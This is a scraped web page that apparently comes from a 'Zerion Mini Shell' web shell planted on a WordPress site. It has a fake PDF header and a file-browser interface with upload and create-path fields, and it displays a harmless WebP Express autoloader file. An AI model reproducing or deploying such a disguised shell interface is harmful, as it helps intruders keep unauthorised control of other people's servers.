%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/var/www/projetos/stb.ind.br/wp-content/plugins/webp-express/wod/
Upload File :
Create Path :
Current File : //proc/self/root/var/www/projetos/stb.ind.br/wp-content/plugins/webp-express/wod/autoloader.php

<?php
define('WOD_DIR', __DIR__);

// setLocale - for converting files with non ascii characters (#406)
setlocale(LC_CTYPE, "C.UTF-8");

function webpexpress_autoloader($class) {
    if (strpos($class, 'WebPExpress\\') === 0) {
        require_once WOD_DIR . '/../lib/classes/' . substr($class, 12) . '.php';
    }
}
spl_autoload_register('webpexpress_autoloader');

Zerion Mini Shell 1.0